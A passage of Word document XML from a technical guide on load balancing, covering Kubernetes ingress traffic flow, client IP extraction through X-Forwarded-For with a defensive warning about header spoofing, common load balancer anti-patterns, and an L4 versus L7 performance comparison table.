    <w:p w14:paraId="15E8D351" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step by step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFF87F2" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="353"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cloud Load Balancer (e.g., AWS ALB):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290F0743" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="353"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Created by Kubernetes Ingress controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40965F98" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="353"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Terminates TLS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DE2448" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="353"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Routes based on host/path rules (L7).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C22C4BB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="353"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Health checks Kubernetes nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE22D53" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="353"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NodePort:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF19880" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="353"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Each node opens a port (e.g., 30080).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E744E0E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="353"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Cloud LB sends traffic to any node's NodePort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE3239D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="353"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The node may or may not be running the target Pod.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD9FE2D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="353"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kube-proxy (IPVS mode):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F8CA67" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="353"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Running on every node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E79CB40" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="353"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Maintains IPVS rules mapping Service ClusterIP → Pod IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31773D6D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="353"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>When a packet arrives for the Service, IPVS picks a Pod (round-robin, least connections, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467C5D02" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="353"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>If Pod is on another node → packet is forwarded via overlay network (VXLAN, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C08EA79" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="353"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pod receives the request and processes it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D17E824" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.2 Why This Multi-Layer Approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49319228" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="354"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cloud LB:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Handles internet-facing traffic, DDoS protection, TLS offload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC0E3B9" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="354"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kube-proxy/IPVS:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Handles internal service-to-service routing without going through an external LB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BECE5DB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="354"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ingress controller (Nginx/Envoy):</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Provides L7 routing rules, request manipulation, rate limiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3ADE80" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.3 Extracting the Real Client IP (A Common Operational Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F76831C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>With multiple proxy layers, the backend sees the immediate upstream's IP, not the real client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50907BE6" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Solution — header chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EDFF45" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3266D64E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>X-Forwarded-For: client_ip, cloud_lb_ip, ingress_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3838D1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Each proxy appends its IP. The backend reads the first entry (the real client).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE87288" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security concern:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> A malicious client can set X-Forwarded-For: fake_ip in their request. The backend must trust only the entries appended by known proxies (count from the right, skip known proxy hops).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197EA59F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:pict w14:anchorId="25678639">
          <v:rect id="_x0000_i2686" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA492EA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17. Load Balancer Anti-Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A4DFCC" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="355"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Single LB without HA:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> The LB itself becomes the single point of failure. Always run in pairs or clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2A3ED7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="355"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Health checks too aggressive:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Marking backends unhealthy from a single failed check → cascading removals → all backends removed → total outage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B9C4FA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="355"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No connection limits:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> One backend gets slow, connections pile up, LB runs out of file descriptors → LB itself fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C682DD" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="355"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sticky sessions hiding scaling problems:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Stickiness masks the fact that the application is stateful. Technical debt grows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04971C2D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="355"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load balancing CPU-bound work by connections:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> If one request takes 10ms and another takes 10s, Least Connections doesn't capture the actual load. Need application-level metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34208D31" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="355"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-AZ LB without accounting for latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> A backend in another AZ adds 1–2ms per request. At high volume, this adds up and creates uneven user experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD55608" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="355"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ignoring the LB's own resource limits:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> LBs have maximum connections, maximum bandwidth, maximum new connections/sec. Exceeding these silently drops traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16526AD1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:pict w14:anchorId="0F94F9F9">
          <v:rect id="_x0000_i2687" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D89BB4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18. Performance Characteristics Comparison</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3330"/>
        <w:gridCol w:w="2487"/>
        <w:gridCol w:w="3533"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="3C82918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DA490A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F15BD1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Aspect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310031" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F15BD1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>L4 LB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E11F82" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F15BD1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>L7 LB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="741DDA3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168119" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Throughput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6382BD" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Millions of RPS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9B3A72" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Hundreds of thousands of RPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="50E4966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494FAA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Added latency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8204F2" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>~10–100 μs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04B019" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>~0.5–5 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="7A9959A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6B0020" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Memory per connection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F0BE7D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>~128–256 bytes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C8ACC9" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>~1–10 KB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="2756414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117C89" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Max concurrent connections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E39360" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>10M+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998A2B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>100K–1M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="2B81F89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123CD8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Protocol awareness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B50954" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>None (any TCP/UDP)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33B3B6" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Full HTTP/gRPC/WebSocket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="4D79EE4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2A06BB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Content-based routing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50F9EB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>No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9078DF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="695157A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B82ABC" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>SSL termination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4C4691" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Possible but limited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3BDB1A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Full support</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="5463802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9C6806" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Request modification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4F9D86" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>No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5AF485" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Yes (headers, body)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="4F5CF35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3889D4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Caching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0C30D3" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>No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BA124C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="5EABB70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F0CCBD" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>WAF/Security rules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EB50F8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>No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8DF98F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C990D02" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:pict w14:anchorId="614680F3">
          <v:rect id="_x0000_i2688" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16950FE6" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19. Real-World Load Balancer Architectures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8F9BEE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
